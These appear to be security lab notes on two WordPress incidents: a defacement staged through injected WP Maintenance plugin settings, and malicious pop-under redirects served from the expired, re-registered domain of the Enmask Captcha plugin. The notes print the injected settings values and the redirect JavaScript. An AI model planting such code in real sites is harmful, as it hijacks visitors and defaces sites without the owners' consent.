Tag: Wordpress Plugins and Themes

Recently, during a website investigation, we detected that attackers have been modifying the database structure of WP Maintenance plugin (which is a very popular wordpress plugin which adds a "down for maintenance" or coming soon page for your website) and inserting malicious code into wpmm_settings option to lead users to the harmful content.

The malware would change the plugin's database values to the defacement page like it follows:

The background:

"bg_custom";s:67:"https://www.website.com/wp-content/uploads/2017/07/anonymous.jpg";

And the message :

s:4:"text";
s:538:"<h2 class="pi-item pi-item-spacing pi-title">“When you’re stuck in a foreign country and don’t know the words for “reverse charges”
and you’re in some lonely skin joint in the middle of some poor slum and just had every last cent robbed from you and you call yourself a bodyguard then you know you’re a loser.\"</h2>
<p style="text-align: left"> </p>

Now, in order to "deface" the website, the attacker would only need to enable the maintenance page. No files were rewritten and inexperienced website owners may have some trouble figuring out what happened and how to fix.

It is worth to mention that the plugin is NOT vulnerable, the attackers were leveraging valid plugin functions instead of replacing the index.php file as usual.

The rendered code will result into something like this:

As website owners, we have to make sure our visitors have the best experience possible and won’t be at risk when accessing your website.

If you detected any unusual code or suspect of any unexpected behavior, we are here to help you get your website back on track.

Malicious redirects are very common in compromised websites. Attackers try to take advantage of the site resources to promote spam, distribute other malware/backdoors, and perform all kinds of malicious activities.

The type of attack described in this labs note though, doesn’t involve a single website being compromised but lots of them being affected by it at the same time. Although this is not a new technique and we’ve already covered in a blog post here (https://blog.sucuri.net/2016/08/plugin-expired-domain-security-threat.html), this variant caught our attention because another plugin was being targeted.

During an Incident Response investigation, we found that malicious redirects were coming from a JavaScript loading via the website enmask.com, which is part of a WordPress plugin called “Enmask Captcha”. https://wordpress.org/plugins/enmask-captcha-text-based-hosted-captcha-solution/

“This plugin hasn’t been updated in over 2 years. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.“

Their domain appears to have expired and somebody else purchased it and now anyone using this plugin would experience redirects on their website since the new owner of the domain is deliberately redirecting users.

Here are some more details about this plugin and what is causing the redirect:

Code found on the page:

&
lt;script type="text/javascript" data-enmask-langcode="en-US" src="hxxp://enmask[.]com//Scripts/Enmask.Captcha.js" data-enmask="true" data-enmask-name="myCaptcha"></script>

Clicking anything on the website leads to this page:

http://findbetterresults[.]com/?dn=enmask.com&pid=9PO755G95

The redirect is caused by the following JavaScript which gets returned when requesting any JavaScript file from the domain; it looks like the new owner of the domain is doing this intentionally:

if (typeof _popwnd == 'undefined') {
   var _popwnd = -1;
    function _popwnd_open(){
       if (_popwnd!=-1) return;
       _popwnd = window.open('hxxp://findbetterresults.com/?dn=enmask.com&pid=9PO755G95', '_blank', '');
       _popwnd.blur();
       window.focus();
    }
};
window.addEventListener('click', _popwnd_open);

If you happen to be using this plugin, we highly recommend removing and/or replacing it with another one which is still supported and could provide you similar functionalities.

Loading images and/or scripts from external websites is not recommended (exceptions may apply, like big CDNs or services like Facebook or Ad networks) for various reasons and here are some:

• If your website looks and feels, or even its functionality relies on those external resources, any availability issues they have will impact on your website;

• If the resource you fetch the content from is compromised, your site may be used to distribute unwanted content (even malicious content) without your consent (like we described in this labs note).